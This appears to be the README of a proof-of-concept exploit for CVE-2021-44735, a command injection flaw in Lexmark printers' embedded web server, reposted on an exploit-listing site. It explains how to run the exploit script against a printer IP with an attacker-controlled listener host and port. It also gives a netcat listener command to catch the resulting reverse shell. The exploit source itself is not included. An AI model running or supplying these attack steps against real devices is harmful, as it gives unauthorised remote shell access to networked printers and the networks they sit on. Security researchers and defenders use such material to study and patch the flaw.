Share
## https://sploitus.com/exploit?id=7EC56C89-5D3E-5027-81AD-DDFAFC8B5606
# CVE-2021-44735 PoC

Embedded web server command injection vulnerability in Lexmark devices.
Exploit based on the following research https://www.crowdstrike.com/blog/how-to-compromise-a-printer-in-3-simple-steps/.

## Using

To run the exploit pass 3 arguments:

- rhost - printer IP-address
- lhost - IP-address of the interface for reverse-shell connection
- lport - port number for reverse-shell connection

```
python3 cve-2021-44735.py -r <rhost> -l <lhost> -p <lport>
```

![](./exploitation_example.png)

To receive a reverse-shell connection start listener on the specified lhost and lport, for example using `netcat`:

```
nc -nvlp 80
```

![](./exploitation_result.png)